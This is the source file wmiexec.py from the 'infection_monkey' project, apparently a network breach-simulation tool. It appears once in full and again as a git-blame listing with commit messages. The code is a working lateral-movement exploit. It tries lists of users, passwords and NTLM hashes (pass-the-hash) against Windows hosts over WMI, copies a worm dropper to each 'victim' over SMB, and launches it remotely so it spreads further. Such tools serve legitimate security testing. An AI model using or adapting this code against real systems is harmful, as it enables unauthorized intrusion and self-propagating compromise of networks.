monkey/infection_monkey/exploit/wmiexec.py

import logging
import ntpath
import socket
import traceback

from impacket.dcerpc.v5.rpcrt import DCERPCException

from exploit import HostExploiter
from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, get_monkey_depth
from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
from tools import build_monkey_commandline

LOG = logging.getLogger(__name__)


class WmiExploiter(HostExploiter):
    _TARGET_OS_TYPE = ['windows']

    def __init__(self, host):
        super(WmiExploiter, self).__init__(host)
        self._config = __import__('config').WormConfiguration
        self._guid = __import__('config').GUID

    @WmiTools.dcom_wrap
    def exploit_host(self):
        src_path = get_target_monkey(self.host)

        if not src_path:
            LOG.info("Can't find suitable monkey executable for host %r", self.host)
            return False

        creds = self._config.get_exploit_user_password_or_hash_product()

        for user, password, lm_hash, ntlm_hash in creds:
            LOG.debug("Attempting to connect %r using WMI with user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
                      self.host, user, password, lm_hash, ntlm_hash)

            wmi_connection = WmiTools.WmiConnection()

            try:
                wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
            except AccessDeniedException:
                self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
                LOG.debug("Failed connecting to %r using WMI with "
                          "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
                          self.host, user, password, lm_hash, ntlm_hash)
                continue
            except DCERPCException:
                self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
                LOG.debug("Failed connecting to %r using WMI with "
                          "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
                          self.host, user, password, lm_hash, ntlm_hash)
                continue
            except socket.error:
                LOG.debug("Network error in WMI connection to %r with "
                          "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
                          self.host, user, password, lm_hash, ntlm_hash)
                return False
            except Exception as exc:
                LOG.debug("Unknown WMI connection error to %r with "
                          "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s') (%s):\n%s",
                          self.host, user, password, lm_hash, ntlm_hash, exc, traceback.format_exc())
                return False

            self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)

            # query process list and check if monkey already running on victim
            process_list = WmiTools.list_object(wmi_connection, "Win32_Process",
                                                fields=("Caption",),
                                                where="Name='%s'" % ntpath.split(src_path)[-1])
            if process_list:
                wmi_connection.close()

                LOG.debug("Skipping %r - already infected", self.host)
                return False

            # copy the file remotely using SMB
            remote_full_path = SmbTools.copy_file(self.host,
                                                  src_path,
                                                  self._config.dropper_target_path_win_32,
                                                  user,
                                                  password,
                                                  lm_hash,
                                                  ntlm_hash,
                                                  self._config.smb_download_timeout)

            if not remote_full_path:
                wmi_connection.close()
                return False
            # execute the remote dropper in case the path isn't final
            elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
                cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
                          build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path_win_32)
            else:
                cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
                          build_monkey_commandline(self.host, get_monkey_depth() - 1)

            # execute the remote monkey
            result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
                                                                                 ntpath.split(remote_full_path)[0],
                                                                                 None)

            if (0 != result.ProcessId) and (0 == result.ReturnValue):
                LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
                         remote_full_path, self.host, result.ProcessId, result.ReturnValue, cmdline)
                success = True
            else:
                LOG.debug("Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
                          remote_full_path, self.host, result.ProcessId, result.ReturnValue, cmdline)
                success = False

            result.RemRelease()
            wmi_connection.close()

            return success

        return False
first commit 2015-08-30 15:27:35 +08:00			`import logging`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`import ntpath`
			`import socket`
first commit 2015-08-30 15:27:35 +08:00			`import traceback`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00
Added functionality to report all brute force password attempts even if unsuccessful. 2016-08-09 05:23:18 +08:00			`from impacket.dcerpc.v5.rpcrt import DCERPCException`
first commit 2015-08-30 15:27:35 +08:00
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`from exploit import HostExploiter`
			`from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, get_monkey_depth`
			`from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS`
			`from tools import build_monkey_commandline`

first commit 2015-08-30 15:27:35 +08:00			`LOG = logging.getLogger(__name__)`

code organization 2015-11-30 16:56:20 +08:00
first commit 2015-08-30 15:27:35 +08:00			`class WmiExploiter(HostExploiter):`
Fix CR 2017-10-16 15:58:11 +08:00			`_TARGET_OS_TYPE = ['windows']`

Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`def __init__(self, host):`
			`super(WmiExploiter, self).__init__(host)`
first commit 2015-08-30 15:27:35 +08:00			`self._config = __import__('config').WormConfiguration`
fixes and improvements after test-run 1 2016-07-20 05:53:41 +08:00			`self._guid = __import__('config').GUID`
first commit 2015-08-30 15:27:35 +08:00
			`@WmiTools.dcom_wrap`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`def exploit_host(self):`
			`src_path = get_target_monkey(self.host)`
- c&c - support for virtual files (monkeyfs) - ssh exploitation - some linux support issues fixed 2015-09-29 22:58:06 +08:00
			`if not src_path:`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`LOG.info("Can't find suitable monkey executable for host %r", self.host)`
- c&c - support for virtual files (monkeyfs) - ssh exploitation - some linux support issues fixed 2015-09-29 22:58:06 +08:00			`return False`

Add pass-the-hash for wmi 2017-09-27 23:30:44 +08:00			`creds = self._config.get_exploit_user_password_or_hash_product()`
Add mimikatz collector Combine all users and passwords in config 2017-08-16 20:14:26 +08:00
Add pass-the-hash for wmi 2017-09-27 23:30:44 +08:00			`for user, password, lm_hash, ntlm_hash in creds:`
			`LOG.debug("Attempting to connect %r using WMI with user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`self.host, user, password, lm_hash, ntlm_hash)`
first commit 2015-08-30 15:27:35 +08:00
			`wmi_connection = WmiTools.WmiConnection()`

			`try:`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)`
first commit 2015-08-30 15:27:35 +08:00			`except AccessDeniedException:`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)`
Add pass-the-hash for wmi 2017-09-27 23:30:44 +08:00			`LOG.debug("Failed connecting to %r using WMI with "`
			`"user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`self.host, user, password, lm_hash, ntlm_hash)`
first commit 2015-08-30 15:27:35 +08:00			`continue`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`except DCERPCException:`
			`self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)`
Add pass-the-hash for wmi 2017-09-27 23:30:44 +08:00			`LOG.debug("Failed connecting to %r using WMI with "`
			`"user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`self.host, user, password, lm_hash, ntlm_hash)`
Added functionality to report all brute force password attempts even if unsuccessful. 2016-08-09 05:23:18 +08:00			`continue`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`except socket.error:`
Add pass-the-hash for wmi 2017-09-27 23:30:44 +08:00			`LOG.debug("Network error in WMI connection to %r with "`
			`"user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`self.host, user, password, lm_hash, ntlm_hash)`
first commit 2015-08-30 15:27:35 +08:00			`return False`
Add pass-the-hash for wmi 2017-09-27 23:30:44 +08:00			`except Exception as exc:`
			`LOG.debug("Unknown WMI connection error to %r with "`
			`"user,password,lm hash,ntlm hash: ('%s','%s','%s','%s') (%s):\n%s",`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`self.host, user, password, lm_hash, ntlm_hash, exc, traceback.format_exc())`
first commit 2015-08-30 15:27:35 +08:00			`return False`

Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)`
first commit 2015-08-30 15:27:35 +08:00
			`# query process list and check if monkey already running on victim`
			`process_list = WmiTools.list_object(wmi_connection, "Win32_Process",`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`fields=("Caption",),`
first commit 2015-08-30 15:27:35 +08:00			`where="Name='%s'" % ntpath.split(src_path)[-1])`
			`if process_list:`
			`wmi_connection.close()`

Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`LOG.debug("Skipping %r - already infected", self.host)`
first commit 2015-08-30 15:27:35 +08:00			`return False`

code organization 2015-11-30 16:56:20 +08:00			`# copy the file remotely using SMB`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`remote_full_path = SmbTools.copy_file(self.host,`
first commit 2015-08-30 15:27:35 +08:00			`src_path,`
Use 32bit as default path 2018-03-04 23:50:35 +08:00			`self._config.dropper_target_path_win_32,`
Implement pass the hash for SMB 2017-09-26 23:11:13 +08:00			`user,`
			`password,`
Add pass-the-hash for wmi 2017-09-27 23:30:44 +08:00			`lm_hash,`
			`ntlm_hash,`
PEP8 in diff files Add concept of non default timeout for copying SMB files. This is by default 5 minutes. Changed behavior of SMB exploiter if file already exists, we don't assume exploitation is useless and try again. Worse case is we run the monkey after it finished running. Changed behavior if managed to connect to machine to IPC$ over some dialect. If Success, we don't try again. 2016-09-05 22:45:27 +08:00			`self._config.smb_download_timeout)`
first commit 2015-08-30 15:27:35 +08:00
- rdp exploitation - http file transfer - ftp server code for future support 2015-09-07 15:25:25 +08:00			`if not remote_full_path:`
code organization 2015-11-30 16:56:20 +08:00			`wmi_connection.close()`
			`return False`
first commit 2015-08-30 15:27:35 +08:00			`# execute the remote dropper in case the path isn't final`
Use 32bit as default path 2018-03-04 23:50:35 +08:00			`elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():`
Fix dropper bug on wmiexec and win_ms08_067 2017-09-04 21:51:22 +08:00			`cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \`
Use 32bit as default path 2018-03-04 23:50:35 +08:00			`build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path_win_32)`
first commit 2015-08-30 15:27:35 +08:00			`else:`
Fix dropper bug on wmiexec and win_ms08_067 2017-09-04 21:51:22 +08:00			`cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`build_monkey_commandline(self.host, get_monkey_depth() - 1)`
added default tunnel is the exploiter added self delete on cleanup fixed argument parsing 2015-10-14 22:22:05 +08:00
first commit 2015-08-30 15:27:35 +08:00			`# execute the remote monkey`
			`result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,`
			`ntpath.split(remote_full_path)[0],`
			`None)`

			`if (0 != result.ProcessId) and (0 == result.ReturnValue):`
			`LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`remote_full_path, self.host, result.ProcessId, result.ReturnValue, cmdline)`
first commit 2015-08-30 15:27:35 +08:00			`success = True`
			`else:`
			`LOG.debug("Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",`
Refactor exploit classes to be per-host, and not per exploit type Exploit telemetry has a more consistent format Minor improvements in exploits 2017-10-11 23:05:03 +08:00			`remote_full_path, self.host, result.ProcessId, result.ReturnValue, cmdline)`
first commit 2015-08-30 15:27:35 +08:00			`success = False`

			`result.RemRelease()`
			`wmi_connection.close()`

			`return success`

			`return False`